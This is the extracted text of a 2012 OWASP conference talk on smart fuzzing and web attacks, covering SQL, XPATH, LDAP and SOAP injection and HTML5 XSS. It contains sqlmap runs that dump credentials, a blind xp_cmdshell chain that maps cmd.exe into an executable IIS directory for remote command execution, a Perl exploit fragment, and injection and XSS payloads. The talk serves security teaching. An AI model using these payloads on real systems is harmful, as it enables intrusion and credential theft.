Find me if you can – smart fuzzing and discovery! shreeraj shah
1. FIND ME IF YOU CAN – SMART FUZZING AND
DISCOVERY
SHREERAJ SHAH
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
2. Who Are We? http://shreeraj.blogspot.com
shreeraj@blueinfy.com
http://www.blueinfy.com
• Founder & Director
– Blueinfy Solutions Pvt. Ltd. (Brief)
– SecurityExposure.com
• Past experience
– Net Square, Chase, IBM & Foundstone
• Interest
– Web security research
• Published research
– Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc.
– Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.
– Advisories - .Net, Java servers etc.
• Books (Author)
– Web 2.0 Security – Defending Ajax, RIA and SOA
– Hacking Web Services
– Web Hacking
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
3. Well Known Fact!
• 90% of sites are vulnerable to one or more
vulnerabilities.
• Exploitable ? – YES!
• Most popular ones are – SQLi & XSS
• SQLi – complete compromise of the
application …
• XSS – Control over browser and exploitation
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
4. Traditional Fuzzing – Not working
• Enterprise running on 2.0 wave - Portal
• Technologies & Components – Dojo, Ajax, XML
Services, Blog, Widgets
• Scan with tools/products failed
• Security issues and hacks
– SQL injection over XML
– Ajax driven XSS
– Several XSS with Blog component
– Several information leaks through JSON fuzzing
– CSRF on both XML and JS-Array
» HACKED
» DEFENSE
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
5. AppSec – Past, Present …
Source - OWASP
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
5
6. Enterprise Technology Trend
• 2007. Web services would rocket from $1.6
billion in 2004 to $34 billion. [IDC]
• 2008. Web Services or Service-Oriented
Architecture (SOA) would surge ahead.
• 2009. Enterprise 2.0 in action and penetrating
deeper into the corporate environment
• 2010. Flex/Cloud/API era.
• 2012. Mobile/HTML5 era.
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
7. Architecture
Documents
News Weather
Mails Bank/Trade
Browser Internet
RSS feeds
Ajax
RIA (Flash) Internet Web 2.0 Start
HTML / JS / DOM
Blog Database Authentication
Application
Infrastructure
Web Services
End point
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
8. Environment
Internet DMZ Trusted
SOAP/JSON etc.
Mobile
Web 2.0 W
Services E
Scripted Application B
Web Web Servers S
Server Engine And E
Static pages only
Web Dynamic pages
(HTML,HTM, etc.) (ASP,DHTML, PHP, Integrated R
Client CGI, etc.) Framework V
X
I
ASP.NET on C
.Net Framework, E
J2EE App Server, S
Web Services,
DB etc.
Internal/Corporate
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
9. Stack/Logic - Layers • Android
• iPhone/Pad
• HTML 5 Other
•
• Storage • Flash
Mobile • AMF
• WebSocket
• DOM
• WebSQL •
• JS • Storage Flex
• XHR • XAML
Server side
Components • Silverlight • WCF
Presentation Layer • NET
Business Layer
Client side
Data Access Layer Components
Authentication (Browser)
Communication etc.
Runtime, Platform, Operating System Components
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
10. Browser & Mobile – Arch.
Mobile
HTML5 + CSS Silverlight Flash
API (Media, Geo etc.) & Messaging Plug-In
Presentation
JavaScript DOM/Events Parser/Threads
Process & Logic
WebSQL Cache Storage
XHR 1 & 2 WebSocket Plug-in Sockets
Browser Native Network Services Network
& Access
SOP/CORS Sandbox Core
Policies
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
11. Case study - Pageflakes
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
12. Case study - Pageflakes
Widgets
Web Services
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
22. JSON
message = {
from : "john@example.com",
to : "jerry@example.com",
subject : "I am fine",
body : "Long message here",
showsubject : function(){document.write(this.subject)}
};
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
24. Ajax driven site
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
25. Crawling with Ruby/Watir
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
26. Attacker’s approach
• Fuzzing over HTTP
• Injecting faults with various set of payload
• Try to raise the exception
• Exception throw message back as part of HTTP
response
• Scanning response for signatures
• If signature found, it becomes interesting
entry for exploitation
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
27. Challenges
• Technology fingerprinting
• Hidden calls
• Framework integration
• Entry points are multiple
• Traditional fuzzing will not work
• Auto assessment can be challenge
• Behavioral assessment with Artificial
intelligence
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
28. Old Approach
• Forcing SQL errors.
• Ideal for identifying database interfaces!
http://192.168.7.120/details.asp?id= ‘3
select * from items where product_id = ‘3
DB
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
29. Error – Now? – forget it
• Premature SQL query termination
We now have an
SQL injection point.
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
30. Blind SQL Injection
• We have SQL injection point but it is not throwing any error message out
as part of its response. Application is sending customized error page
which is not revealing any signature by which we can deduce potential
SQL flaw.
• Knowing SQL injection point or loophole in web application, xp_cmdshell
seems to be working. But we can’t say is it working or not since it doesn’t
return any meaningful signature. This is “blind xp_cmdshell”.
• Firewall don’t allow outbound traffic so can’t do ftp, tftp, ping etc from
the box to the Internet by which you can confirm execution of the
command on the target system.
• We don’t know the actual path to webroot so can’t copy file to location
which can be accessed over HTTP or HTTPS later to confirm the execution
of the command.
• If we know path to webroot and directory structure but can’t find execute
permission on it so can’t copy cmd.exe or any other binary and execute
over HTTP/HTTPS.
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
32. Running tools
• SQL Map or Absinthe
D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 18:47:58
[18:48:00] [WARNING] the remote DMBS is not MySQL
[18:48:00] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
---
[*] shutting down at: 18:48:14
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
33. Enumeration…
D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 --dbs
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 18:53:10
[18:53:12] [WARNING] the remote DMBS is not MySQL
[18:53:12] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
---
available databases [9]:
[*] CmdExec_example
[*] Dashboard
[*] catalog
[*] demotrading
[*] master
[*] model
[*] msdb
[*] order
[*] tempdb
[*] shutting down at: 18:55:07
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
34. Enumeration…
D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --tables -D
catalog
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 18:59:21
[18:59:22] [WARNING] the remote DMBS is not MySQL
[18:59:22] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
Database: catalog
[3 tables]
+--------------+
| auth |
| dtproperties |
| items |
+--------------+
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
35. Enumeration…
D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --dump -D ca
talog -T auth
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 19:01:27
[19:01:28] [WARNING] the remote DMBS is not MySQL
[19:01:28] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
Database: catalog
Table: auth
[3 entries]
+--------+------+---------+
| access | user | pass |
+--------+------+---------+
| 101010 | dbo | john123 |
| 110011 | | great |
| 001011 | | loveit |
+--------+------+---------+
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
36. Blind Exploiting
Set WshShell = WScript.CreateObject("WScript.Shell")
Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%")
windir = ObjExec.StdOut.ReadLine()
Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT")
Set Dir = Root.Create("IIsWebVirtualDir", "secret")
Dir.Path = windir
Dir.AccessExecute = True
Dir.SetInfo
http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Set WshShell =
WScript.CreateObject("WScript.Shell") > c:secret.vbs’
…..
…..
…..
http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Dir.SetInfo
>> c:secret.vbs’
http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:secret.vbs’
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
37. Get the cmd.exe
• Run command over HTTP/HTTPS
• http://target/secret/system32/cmd.exe?+/c+set
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
38. Running…
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $path = $self->GetVar('RPATH');
my $vhost = $self->GetVar('VHOST');
my @url = split(/#/, $path);
my @payload =
("EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject("WScript.Shell")>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject("IIS://LocalHost/W3SVC/1/ROOT")>>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create("IIsWebVirtualDir","secret")>>c:secret.vb s'",
"EXEC+master..xp_cmdshell+'echo+Dir.Path+=+"c:winntsystem32">>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'cscript+c:secret.vbs'"
);
$self->PrintLine("[+] Sending SQL injection payload...");
for(my $count=0;$count<=6;$count++)
..
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
39. XPATH injection
• XPATH parsing standard error
• XPATH is method available for XML parsing
• MS SQL server provides interface and one can
get table content in XML format.
• Once this is fetched one can run XPATH
queries and obtain results.
• What if username/password parsing done on
using XPATH – XPATH injection
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
40. XPATH injection
string fulltext = "";
string coString =
"Provider=SQLOLEDB;Server=(local);database=order;User
ID=sa;Password=mypass";
SqlXmlCommand co = new SqlXmlCommand(coString);
co.RootTag="Credential";
co.CommandType = SqlXmlCommandType.Sql;
co.CommandText = "SELECT * FROM users for xml Auto";
XmlReader xr = co.ExecuteXmlReader();
xr.MoveToContent();
fulltext = xr.ReadOuterXml();
XmlDocument doc = new XmlDocument();
doc.LoadXml(fulltext);
string credential = "//users[@username='"+user+"' and
@password='"+pass+"']";
XmlNodeList xmln = doc.SelectNodes(credential);
string temp;
if(xmln.Count > 0)
{
//True
}
else //false
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
41. XPATH injection
string credential =
"//users[@username='"+user+"' and
@password='"+pass+"']";
• XPATH parsing can be leveraged by passing
following string ' or 1=1 or ''=‘
• This will always true on the first node and
user can get access as who ever is first user.
Bingo!
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
42. LDAP Injection
Resource viewer :
http://www.something.com/res.cgi?type=1)(uid=*))
•Notice the injection
•Attacker bypasses the user id check
•(S)he can view all machines now
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
43. SOAP – INJECTIONS & FUZZING
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
44. Fetching Calls
• Identifying services layer calls
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
45. Technology Identification
• Location can be obtained from UDDI
as well, if already published.
• WSDL location [ Access Point ]
http://192.168.11.2/ws/dvds4less.asmx?wsdl
.asmx – indicates
.Net server from MS
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
46. SOAP request
SOAP
Envelope
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfo xmlns="http://tempuri.org/">
<id>1</id>
</getProductInfo>
</soap:Body>
</soap:Envelope>
Input to the
method
Method
Call
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
47. SOAP response
SOAP
Envelope
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfoResponse xmlns="http://tempuri.org/">
<getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult>
</getProductInfoResponse>
</soap:Body>
</soap:Envelope>
Output to the
method Method
response
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
48. HTML5 & CLIENT SIDE FUZZING
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
49. HTML5 – Tags/Attributes/Events
• Tags – media (audio/video), canvas
(getImageData), menu, embed,
buttons/commands, Form control (keys)
• Attributes – form, submit, autofocus,
sandbox, manifest, rel etc.
• Events/Objects – Navigation (_self), Editable
content, Drag-Drop APIs, pushState (History)
etc.
49
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
50. HTML5 – XSS
• Blacklist and filter will get bypassed
• Lot of new signatures and possible ways to
execute scripts
• XSS can be injected from tags and events
• New attributes are available for XSS payload
50
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
51. XSS variants
• Media tags
• Examples
– <video><source onerror="javascript:alert(1)“>
– <video onerror="javascript:alert(1)"><source>
51
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
56. DOM with HTML5
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
57. DOM based XSS - Messaging
• It is a sleeping giant in the Ajax applications
coupled with Web Messaging
• Root cause
– DOM is already loaded
– Application is single page and DOM remains same
– New information coming needs to be injected in using
various DOM calls like eval()
– Information is coming from untrusted sources
– JSONP usage
– Web Workers and callbacks
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
58. AJAX with HTML5 – DOM
• Ajax function would be making a back-end call
• Back-end would be returning JSON stream or
any other and get injected in DOM
• In some libraries their content type would
allow them to get loaded in browser directly
• In that case bypassing DOM processing…
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
59. APIs …
• HTML5 few other APIs are interesting from
security standpoint
– File APIs – allows local file access and can mixed
with ClickJacking and other attacks to gain client
files.
– Drag-Drop APIs – exploiting self XSS and few other
tricks, hijacking cookies …
– Lot more to explore and defend…
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)